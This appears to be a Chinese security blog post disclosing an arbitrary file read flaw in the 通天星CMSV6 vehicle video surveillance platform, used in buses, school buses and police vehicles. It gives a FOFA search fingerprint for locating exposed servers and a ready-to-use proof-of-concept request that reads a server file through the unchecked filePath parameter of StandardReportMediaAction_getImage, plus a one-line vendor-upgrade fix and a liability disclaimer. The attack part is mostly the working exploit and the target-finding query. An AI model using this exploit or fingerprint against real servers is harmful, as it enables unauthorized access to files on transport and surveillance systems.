文章总结： 通天星CMSV6车载视频监控平台存在信息泄露漏洞，由于StandardReportMediaAction_getImage接口对filePath参数过滤不严，攻击者可构造路径读取服务器任意文件。POC已提供，建议联系厂商升级到最新版本以修复此漏洞。 综合评分： 81 文章分类： 漏洞分析,漏洞POC,车联网安全,WEB安全,数据安全

漏洞复现|通天星CMSV6车载视频监控平台_StandardReportMediaAction_getImage存在信息泄露漏洞

原创

小白菜安全

小白菜安全

2025年12月15日 17:30 浙江

漏洞描述

通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台接口对 filePath等参数过滤不严，未经验证即可构造路径读取服务器任意文件。

资产信息

fofa:body=”./open/webApi.html”

漏洞复现

POC

/808gps/StandardReportMediaAction_getImage.action?filePath=C://Windows//win.ini&fileOffset=1&fileSize=100

修复

联系厂商（东莞市通天星软件科技有限公司）获取最新的安全版本并及时进行升级。

免责声明

该公众号主要是分享互联网上公开的一些漏洞poc和工具，利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，本公众号及作者不为此承担任何责任，一旦造成后果请自行承担！如果本公众号分享导致的侵权行为请告知，我们会立即删除并道歉。

查看原文：《漏洞复现|通天星CMSV6车载视频监控平台StandardReportMediaActiongetImage存在信息泄露漏洞》